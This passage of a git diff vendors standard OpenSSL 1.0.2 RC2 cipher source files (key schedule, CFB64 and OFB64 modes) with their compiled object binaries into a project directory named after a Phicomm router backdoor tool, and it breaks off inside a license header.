+                        case 2: *(--(c))=(unsigned char)(((l1)>> 8L)&0xff); \
+                        case 1: *(--(c))=(unsigned char)(((l1)     )&0xff); \
+                                } \
+                        }
+
+/* NOTE - c is not incremented as per n2l */
+#define n2ln(c,l1,l2,n) { \
+                        c+=n; \
+                        l1=l2=0; \
+                        switch (n) { \
+                        case 8: l2 =((unsigned long)(*(--(c))))    ; \
+                        case 7: l2|=((unsigned long)(*(--(c))))<< 8; \
+                        case 6: l2|=((unsigned long)(*(--(c))))<<16; \
+                        case 5: l2|=((unsigned long)(*(--(c))))<<24; \
+                        case 4: l1 =((unsigned long)(*(--(c))))    ; \
+                        case 3: l1|=((unsigned long)(*(--(c))))<< 8; \
+                        case 2: l1|=((unsigned long)(*(--(c))))<<16; \
+                        case 1: l1|=((unsigned long)(*(--(c))))<<24; \
+                                } \
+                        }
+
+/* NOTE - c is not incremented as per l2n */
+#define l2nn(l1,l2,c,n) { \
+                        c+=n; \
+                        switch (n) { \
+                        case 8: *(--(c))=(unsigned char)(((l2)    )&0xff); \
+                        case 7: *(--(c))=(unsigned char)(((l2)>> 8)&0xff); \
+                        case 6: *(--(c))=(unsigned char)(((l2)>>16)&0xff); \
+                        case 5: *(--(c))=(unsigned char)(((l2)>>24)&0xff); \
+                        case 4: *(--(c))=(unsigned char)(((l1)    )&0xff); \
+                        case 3: *(--(c))=(unsigned char)(((l1)>> 8)&0xff); \
+                        case 2: *(--(c))=(unsigned char)(((l1)>>16)&0xff); \
+                        case 1: *(--(c))=(unsigned char)(((l1)>>24)&0xff); \
+                                } \
+                        }
+
+#undef n2l
+#define n2l(c,l)        (l =((unsigned long)(*((c)++)))<<24L, \
+                         l|=((unsigned long)(*((c)++)))<<16L, \
+                         l|=((unsigned long)(*((c)++)))<< 8L, \
+                         l|=((unsigned long)(*((c)++))))
+
+#undef l2n
+#define l2n(l,c)        (*((c)++)=(unsigned char)(((l)>>24L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)     )&0xff))
+
+#define C_RC2(n) \
+        t=(x0+(x1& ~x3)+(x2&x3)+ *(p0++))&0xffff; \
+        x0=(t<<1)|(t>>15); \
+        t=(x1+(x2& ~x0)+(x3&x0)+ *(p0++))&0xffff; \
+        x1=(t<<2)|(t>>14); \
+        t=(x2+(x3& ~x1)+(x0&x1)+ *(p0++))&0xffff; \
+        x2=(t<<3)|(t>>13); \
+        t=(x3+(x0& ~x2)+(x1&x2)+ *(p0++))&0xffff; \
+        x3=(t<<5)|(t>>11);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_skey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_skey.c
new file mode 100644
index 0000000..bcec0a8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_skey.c
@@ -0,0 +1,157 @@
+/* crypto/rc2/rc2_skey.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/crypto.h>
+#include <openssl/rc2.h>
+#include "rc2_locl.h"
+
+static const unsigned char key_table[256] = {
+    0xd9, 0x78, 0xf9, 0xc4, 0x19, 0xdd, 0xb5, 0xed, 0x28, 0xe9, 0xfd, 0x79,
+    0x4a, 0xa0, 0xd8, 0x9d, 0xc6, 0x7e, 0x37, 0x83, 0x2b, 0x76, 0x53, 0x8e,
+    0x62, 0x4c, 0x64, 0x88, 0x44, 0x8b, 0xfb, 0xa2, 0x17, 0x9a, 0x59, 0xf5,
+    0x87, 0xb3, 0x4f, 0x13, 0x61, 0x45, 0x6d, 0x8d, 0x09, 0x81, 0x7d, 0x32,
+    0xbd, 0x8f, 0x40, 0xeb, 0x86, 0xb7, 0x7b, 0x0b, 0xf0, 0x95, 0x21, 0x22,
+    0x5c, 0x6b, 0x4e, 0x82, 0x54, 0xd6, 0x65, 0x93, 0xce, 0x60, 0xb2, 0x1c,
+    0x73, 0x56, 0xc0, 0x14, 0xa7, 0x8c, 0xf1, 0xdc, 0x12, 0x75, 0xca, 0x1f,
+    0x3b, 0xbe, 0xe4, 0xd1, 0x42, 0x3d, 0xd4, 0x30, 0xa3, 0x3c, 0xb6, 0x26,
+    0x6f, 0xbf, 0x0e, 0xda, 0x46, 0x69, 0x07, 0x57, 0x27, 0xf2, 0x1d, 0x9b,
+    0xbc, 0x94, 0x43, 0x03, 0xf8, 0x11, 0xc7, 0xf6, 0x90, 0xef, 0x3e, 0xe7,
+    0x06, 0xc3, 0xd5, 0x2f, 0xc8, 0x66, 0x1e, 0xd7, 0x08, 0xe8, 0xea, 0xde,
+    0x80, 0x52, 0xee, 0xf7, 0x84, 0xaa, 0x72, 0xac, 0x35, 0x4d, 0x6a, 0x2a,
+    0x96, 0x1a, 0xd2, 0x71, 0x5a, 0x15, 0x49, 0x74, 0x4b, 0x9f, 0xd0, 0x5e,
+    0x04, 0x18, 0xa4, 0xec, 0xc2, 0xe0, 0x41, 0x6e, 0x0f, 0x51, 0xcb, 0xcc,
+    0x24, 0x91, 0xaf, 0x50, 0xa1, 0xf4, 0x70, 0x39, 0x99, 0x7c, 0x3a, 0x85,
+    0x23, 0xb8, 0xb4, 0x7a, 0xfc, 0x02, 0x36, 0x5b, 0x25, 0x55, 0x97, 0x31,
+    0x2d, 0x5d, 0xfa, 0x98, 0xe3, 0x8a, 0x92, 0xae, 0x05, 0xdf, 0x29, 0x10,
+    0x67, 0x6c, 0xba, 0xc9, 0xd3, 0x00, 0xe6, 0xcf, 0xe1, 0x9e, 0xa8, 0x2c,
+    0x63, 0x16, 0x01, 0x3f, 0x58, 0xe2, 0x89, 0xa9, 0x0d, 0x38, 0x34, 0x1b,
+    0xab, 0x33, 0xff, 0xb0, 0xbb, 0x48, 0x0c, 0x5f, 0xb9, 0xb1, 0xcd, 0x2e,
+    0xc5, 0xf3, 0xdb, 0x47, 0xe5, 0xa5, 0x9c, 0x77, 0x0a, 0xa6, 0x20, 0x68,
+    0xfe, 0x7f, 0xc1, 0xad,
+};
+
+#if defined(_MSC_VER) && defined(_ARM_)
+# pragma optimize("g",off)
+#endif
+
+/*
+ * It has come to my attention that there are 2 versions of the RC2 key
+ * schedule.  One which is normal, and anther which has a hook to use a
+ * reduced key length. BSAFE uses the 'retarded' version.  What I previously
+ * shipped is the same as specifying 1024 for the 'bits' parameter.  Bsafe
+ * uses a version where the bits parameter is the same as len*8
+ */
+void RC2_set_key(RC2_KEY *key, int len, const unsigned char *data, int bits)
+#ifdef OPENSSL_FIPS
+{
+    fips_cipher_abort(RC2);
+    private_RC2_set_key(key, len, data, bits);
+}
+
+void private_RC2_set_key(RC2_KEY *key, int len, const unsigned char *data,
+                         int bits)
+#endif
+{
+    int i, j;
+    unsigned char *k;
+    RC2_INT *ki;
+    unsigned int c, d;
+
+    k = (unsigned char *)&(key->data[0]);
+    *k = 0;                     /* for if there is a zero length key */
+
+    if (len > 128)
+        len = 128;
+    if (bits <= 0)
+        bits = 1024;
+    if (bits > 1024)
+        bits = 1024;
+
+    for (i = 0; i < len; i++)
+        k[i] = data[i];
+
+    /* expand table */
+    d = k[len - 1];
+    j = 0;
+    for (i = len; i < 128; i++, j++) {
+        d = key_table[(k[j] + d) & 0xff];
+        k[i] = d;
+    }
+
+    /* hmm.... key reduction to 'bits' bits */
+
+    j = (bits + 7) >> 3;
+    i = 128 - j;
+    c = (0xff >> (-bits & 0x07));
+
+    d = key_table[k[i] & c];
+    k[i] = d;
+    while (i--) {
+        d = key_table[k[i + j] ^ d];
+        k[i] = d;
+    }
+
+    /* copy from bytes into RC2_INT's */
+    ki = &(key->data[63]);
+    for (i = 127; i >= 0; i -= 2)
+        *(ki--) = ((k[i] << 8) | k[i - 1]) & 0xffff;
+}
+
+#if defined(_MSC_VER)
+# pragma optimize("",on)
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_skey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2_skey.o
new file mode 100644
index 0000000000000000000000000000000000000000..dba03f31c7fe1ba598f6b326ecf036436f9971bb
GIT binary patch
literal 2064
zcmb<-^>JfjWMqH=Mg}_u1P><4z%YRY!FB*M9T@l+co{zP%l+y+(fF?cD7F(s9AjtT
z_y4$)0jR$9KplrIh{5l7!tj9Qu{vItE*2)24i<Kg{|8>b_elQc+4<9_mlddsfq$Ee
z`F~H%kInz;>qQ)ySPc2M9dP8|#=_9SV(#((*z4!Lf$Td#=6}Dr?>~?__=~yuA-m><
z%l|x*FL})HVEpCN%fs%dWaz-Z?Hf=dkAY(cXX}9yQ6nFL|NPrdf`m9aeAxec{6F#f
z`Hp(9l_Ko?+kip`A8~M=>I`xJ=h6Iv$)owl|I#Oif%0H*v*PCw$-7(MYP|eg>9yd-
z++%g-&Dv$beMvqk9WLF!7m3e`{Mx?RUpUb<x0kcA)@X0P!|S%~)!ZMZDk{Zf`!$7J
zOPzc!VUtX8*a4B{Js<A~m7bEf-uL99lkF9Q#Wvg2^7r%Ia?4~7SN|kCd(RYS<{yH`
zzfE{=_nhtURs9oba@RRtyt>yA^zM7hs-iWfzFAt+q%IXkiF%fJ&%Y4IBC+Jnp$Cq6
z{DG&>s7zcRu<%QP<;)tZR^=UAs{SyUMXQERH`I;&HREyDq;;(KH3iahcAdP;@a+7<
zc`J01#Te})9(AtdwJ?!hZTx@3ZV#ULog2^U9sPXU{pr#<<y^}YGXB*cT+86@>};i=
z5t>w*S5m5Asb{QbplfJe3g#Nt85!sqm}o+TA>jo|CIUbVid1*MPzELjh65lmW*`Ou
z5eUV=SQW&;SRueD&BM+y0hr)G;xbUV8&Db_1xlkV3?D&B0Ru2&O~D{Hz+8c<g&CAa
z(EtyS&j|JfR01heFe8g2>0@SKN8%xv%nTd|4ibx*ffI>`U@|kXAvjQ$7?2i1@)tae
zijs}ui?dTJ^^zHYWPC|tQcfyEkTXy)wIm)W0@d#VrGfDQHvP|k2v9&02g$*KUU6kE
z&@cwQ;*uf=odIJNrRF5+m84dbFzBTumLxLhB^4Jl=oRHdILZ0Bxv6<TxxD<6R6SrC
z&@C=WOwNY#)ALI83X1XzQj1C|fqFnDrDnvZ6(#1T!mXx+p#anjiYoLFbO4Hh06g3v
zT%-_%2uK4dP-<|1aN*<&Xws2@if{vIkUg-Ng^8;{#nDrm1XB8e8Ud!zg>|52lB?ek
zYClR`0>u<y7Qtw+?LcuT4Wlf943H87m;jVkfEuWcCJr+WMmquJVQgfj-sld3N}{U`
z0*Zrj5xVjKsDJ`gAB=*9Ka8IRWPr>>*Ixh?K=&8Aeo!jJ7XPp!0v6Ap_y^@)n0}Zz
zHoJk!7#6_X5A`spd;yt(t{-G3dfWqr7!E)Ml|URMfF6E=KsjvsC7?xI36fqA6J0+5
D!yPhR

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2cfb64.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2cfb64.c
new file mode 100644
index 0000000..8b5929f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2cfb64.c
@@ -0,0 +1,123 @@
+/* crypto/rc2/rc2cfb64.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/rc2.h>
+#include "rc2_locl.h"
+
+/*
+ * The input and output encrypted as though 64bit cfb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+
+void RC2_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                       long length, RC2_KEY *schedule, unsigned char *ivec,
+                       int *num, int encrypt)
+{
+    register unsigned long v0, v1, t;
+    register int n = *num;
+    register long l = length;
+    unsigned long ti[2];
+    unsigned char *iv, c, cc;
+
+    iv = (unsigned char *)ivec;
+    if (encrypt) {
+        while (l--) {
+            if (n == 0) {
+                c2l(iv, v0);
+                ti[0] = v0;
+                c2l(iv, v1);
+                ti[1] = v1;
+                RC2_encrypt((unsigned long *)ti, schedule);
+                iv = (unsigned char *)ivec;
+                t = ti[0];
+                l2c(t, iv);
+                t = ti[1];
+                l2c(t, iv);
+                iv = (unsigned char *)ivec;
+            }
+            c = *(in++) ^ iv[n];
+            *(out++) = c;
+            iv[n] = c;
+            n = (n + 1) & 0x07;
+        }
+    } else {
+        while (l--) {
+            if (n == 0) {
+                c2l(iv, v0);
+                ti[0] = v0;
+                c2l(iv, v1);
+                ti[1] = v1;
+                RC2_encrypt((unsigned long *)ti, schedule);
+                iv = (unsigned char *)ivec;
+                t = ti[0];
+                l2c(t, iv);
+                t = ti[1];
+                l2c(t, iv);
+                iv = (unsigned char *)ivec;
+            }
+            cc = *(in++);
+            c = iv[n];
+            iv[n] = cc;
+            *(out++) = c ^ cc;
+            n = (n + 1) & 0x07;
+        }
+    }
+    v0 = v1 = ti[0] = ti[1] = t = c = cc = 0;
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2cfb64.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2cfb64.o
new file mode 100644
index 0000000000000000000000000000000000000000..ac914429604c01b8d87412b8d6f8231d00eec1a2
GIT binary patch
literal 1976
zcmbtTO-vI}5PtmuD&kU%(Hacd!)j`fO$$T|CZ?~nWouSZX!W4Dwxx)HmZse%V2B>7
zrb|UV8Sf^>iwAEWNkBaqy?FHK#lM4p@nB5WdAskGZ7CO=WHK|~o0&InX5Nj69JSkQ
zh>;DQKpPfA5n6C==s`mbqFty1{p{@dgU`n_9iNM7Z*k(3_6Eme+OLGHy_k^7Ujw+h
ze@d!44|*X;(!zq*zbdUb_m-E0Jd#$H1dpUSh0dGL;8;E`fc6x$TklK0Y6QvJZ%JDc
zTqMp@jW~(qKa$(4aR{u!k(MAjuO*yP`W;^GjOpw8nq>PN(_fW8wDq^+iY(}r_AigN
zm-01U-bYh@GE)YZ{gp2N4_t{0x;!KZrN>yCL{b%AHYE+1?^IiiBBk<r;KC%nh$rzS
ztgNBYk&$8En@E*%YKb2b2Si_=|5(W|{nz__qHpl93Bv<PyWPMoz@w)V$d1q|!5qMZ
z_Lu_Mu8kwxg4@>J(dN1jg9`(GfS&b|K}I?EJ$r=n+;v1ae#IH#ymwl{obPsPm<yEK
z!d%|2a{<ixFy{?%e2DXeICqG1(G;5mN$Eu2^-Tu=IGSz_!CBSyQ4Zsk^%$`nsC6@F
z;B8yr&C7Kd-K!7j0CTscPNPSF^#GH8H_{*g&G6tBI4Y$3)6=P=gJK$ukMt{su4HoQ
z!eU-U%BVaR!m=_JjZQ@3N*sseh+_EFJd~oEOwTImnOS8zd3BD}Q=|&nft|pAb(3Ch
zfqUpDCjR8j%%7+Juuo*CHb^WkX4Pa0iAA+w${D5=GIL2$%`B)$oJy)mB&Lc*B&O%H
z*-Q?w+`O6*VMqIn%Bg)NR}%Au`Fy6JE+Wy$keN}Y3(0I|<Iexkc!(uWY}}L}V1(FQ
zP0RFUI+5MLq&GoeD?OpBDp9Z<B)Nxen1|wrDBif)v$XHjttJ}bBXB};Za3Z!u_UJt
z*h=jFUMmPXyPwHn3ubkFz#Ob#6W^17k>6OiLtsCo@jU2OV*O)S3KZhn82_BcUuKR}
zHpWi^-fVu~XhYeY$oxnwi)VPVyUA4^T2O%2LH^o~Ch-JooE<>u3<b{;!$LG&4e0`{
SS-gup3aIw+O|v#XYNCI$!R&be

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2ofb64.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2ofb64.c
new file mode 100644
index 0000000..b9f4d8c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2ofb64.c
@@ -0,0 +1,110 @@
+/* crypto/rc2/rc2ofb64.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/rc2.h>
+#include "rc2_locl.h"
+
+/*
+ * The input and output encrypted as though 64bit ofb mode is being used.
+ * The extra state information to record how much of the 64bit block we have
+ * used is contained in *num;
+ */
+void RC2_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+                       long length, RC2_KEY *schedule, unsigned char *ivec,
+                       int *num)
+{
+    register unsigned long v0, v1, t;
+    register int n = *num;
+    register long l = length;
+    unsigned char d[8];
+    register char *dp;
+    unsigned long ti[2];
+    unsigned char *iv;
+    int save = 0;
+
+    iv = (unsigned char *)ivec;
+    c2l(iv, v0);
+    c2l(iv, v1);
+    ti[0] = v0;
+    ti[1] = v1;
+    dp = (char *)d;
+    l2c(v0, dp);
+    l2c(v1, dp);
+    while (l--) {
+        if (n == 0) {
+            RC2_encrypt((unsigned long *)ti, schedule);
+            dp = (char *)d;
+            t = ti[0];
+            l2c(t, dp);
+            t = ti[1];
+            l2c(t, dp);
+            save++;
+        }
+        *(out++) = *(in++) ^ d[n];
+        n = (n + 1) & 0x07;
+    }
+    if (save) {
+        v0 = ti[0];
+        v1 = ti[1];
+        iv = (unsigned char *)ivec;
+        l2c(v0, iv);
+        l2c(v1, iv);
+    }
+    t = v0 = v1 = ti[0] = ti[1] = 0;
+    *num = n;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2ofb64.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2ofb64.o
new file mode 100644
index 0000000000000000000000000000000000000000..b05fc7fc1a71dd470ab2de2f2ff0d5ca365a9ec5
GIT binary patch
literal 1896
zcmbtT&1(};5PxaXCTiVADUwntdx)~4T{daZw1VX2s~g!WwvCEfmn7X9Y4bs{fmB3=
zP;re_{{;OnyjiFpH!tGJi{M4jBBFQ@A<o;p*Cgxqq63qe`MvqQnarELoluf}4hLf5
zK&MbAVkkm_tK&yZH-h$}LG*oS>=(X}GFte2%J_-Xcz$Nxe;^&$nv)w}WZaZ+v+i1y
zo329wuw*0d4+l0<O@x~x%KD0*mkpi#-1H0NOq!Yep<h~iUppxqZxrLJVkmxJ>!kum
zUKxDPCsMi@_wz~<P89IGGI$=sg+Krsl5=nIeRrz$s<j!64@;@m>&8bnzL#u$e!8}$
z4-qyt$Rz?cA}(x<$l!+;<%xEWdcRpjZoH5$FW@V90bj-HCYp}Lrg$NptrhheKPgU#
z(s<xR%?ty#f|4kOj<jKOIEakP3)&AleI||i5ZWM^6O_ns+aSk{S>&jD9ixM8&tn+8
z0{B6CX7-WfypQ@4obRDC!SU;^C?`DVPjJ%RffyHVxZ~U%N8fWUj5!H&LX_j9oG;3G
zqnwA{v6CTh>_XpKcIQsp4IsU<?t58I^WXMjByysGzd;js?||EP?KG#@OBsZ4e^;O8
ztN<GWC3Ck*2mm`gvICAPxnOB2dpsoO&}=NIn!c(PbCuPyj?`)8Y!oZ%*<^AqF|W?!
zsFG04yzLCNs%LV`YA(O5E@iH-uzt$aA-k{#^mnT*@49gE-x$tQ9QKFoP)Ee-YC+Fr
zkyzC$ZJTFaMO(>;x>nbbxR}v1NX%BNNX(TA1+55Jv7~Dv?BuxFA&svUYht-lDr*&e
z6^Z5zT3%hMWC~iR=6`rRaLLYDHzEQU5%zxVsGZAvVn;#A%p#!OQl={@QE)d{QipAl
zkK%_ZZrxykB-@A;J_b4D&VS_xfJ^RVeS&KWtACUM)Ux`_P65vR?$kLu&?fgZVC1Xo
z*&&E8Qa%rUx3Kv!EDH`vwestfpJ$2GTKNlr+r8ftI#Bjb<oyVj@fmJco0R%M>xZc&
m-_$M}KEbSS2N3d6@Ei%cgkHCe>;un^|BQm$A2?-L`F{Wo-OU~V

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2speed.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2speed.c
new file mode 100644
index 0000000..3e45eb0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/rc2speed.c
@@ -0,0 +1,262 @@
+/* crypto/rc2/rc2speed.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
